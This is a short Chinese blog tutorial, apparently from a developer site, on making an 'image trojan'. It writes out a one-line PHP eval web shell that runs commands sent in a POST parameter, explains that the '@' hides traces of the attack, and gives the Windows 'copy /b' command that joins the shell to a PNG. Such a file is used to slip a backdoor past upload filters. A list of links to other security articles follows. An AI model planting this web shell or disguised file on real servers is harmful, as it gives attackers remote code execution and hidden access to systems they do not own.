图片马合成保姆级教程

相信爱看博主文章的各位彦祖和亦非们都看过博主在文章中提到图片马

那到底什么是图片马呢?

简单来说就是图片与木马合成的二进制文件

怎么合成呢?

这里博主就直接进入正题了

首先我们要新建一个文件夹

然后把图片和木马都放进去这个文件夹里面

这里博主的木马是这样写的

<?php @eval($_POST'cmd');?>

这个的意思是

  • <?php ... ?>:PHP代码标记,表示中间内容是PHP脚本。

  • @:错误抑制符,让即使后续函数出错也不显示报错,目的是隐藏攻击痕迹。

  • eval($_POST['cmd'])

    • $_POST['cmd']:接收HTTP POST请求中参数名为cmd的值。

    • eval():把传入的字符串当作PHP代码执行

图片的内容则是保持原有的不变

最后启动cmd,执行下述命令

copy /b C:\Users\11548\Desktop\新建文件夹\1.png + C:\Users\11548\Desktop\新建文件夹\2.php C:\Users\11548\Desktop\新建文件夹\3.png

这里的意思就是复制,用二进制的形式,这里博主使用的是绝对路径

第一个是图片的绝对路径

第二个是木马的绝对路径

第三个是生成图片马的绝对路径

中间的+号,前后都有空格

这里的图片马就是把图片和木马的代码合并放一起了

到这里我们就会生成图片马在文件夹中

文章到此结束

有不懂的欢迎评论区留言

博主看到会及时回复

感谢您宝贵的时间

相关推荐
jieyucx3 小时前
【高级利用】条件竞争与逻辑漏洞:与服务器赛跑的艺术
android·运维·服务器·web安全·文件上传
RobinDevNotes4 小时前
开源AI渗透测试智能体自动验证真实漏洞
人工智能·网络安全·ai·个人开发·开发工具
AI人工智能+电脑小能手6 小时前
【大白话说Java面试题 第216题】【10_网络协议篇】第7题:HTTP 协议和 HTTPS 协议的区别
java·http·网络安全·https·ssl/tls
jieyucx8 小时前
【服务器特性】结合服务器/CMS:解析漏洞实战
运维·服务器·web安全·文件上传
虹科网络安全17 小时前
解读CRA横向标准EN 40000系列:从法规文本到工程落地 | CRA合规之路(七)
网络·安全·web安全
2301_780789661 天前
零信任时代:WAF 从边界防护到微隔离的架构跃迁
网络·安全·web安全·kubernetes·ddos
紫禁玄科1 天前
公共WiFi流量安全全解析
网络·人工智能·web安全·网络安全·系统安全
执念WRD1 天前
VulnTarget-C 渗透实战:外网入口到域控权限提升
网络·安全·web安全·网络安全
雾屿_Mistisle1 天前
XXE 漏洞 CTF
web安全
YucongCai1 天前
Opengovernment(智慧城市) v0.0.3 攻防一体的智能体主动网络安全平台:ActiveCybersecurity v0.2
人工智能·web安全·智慧城市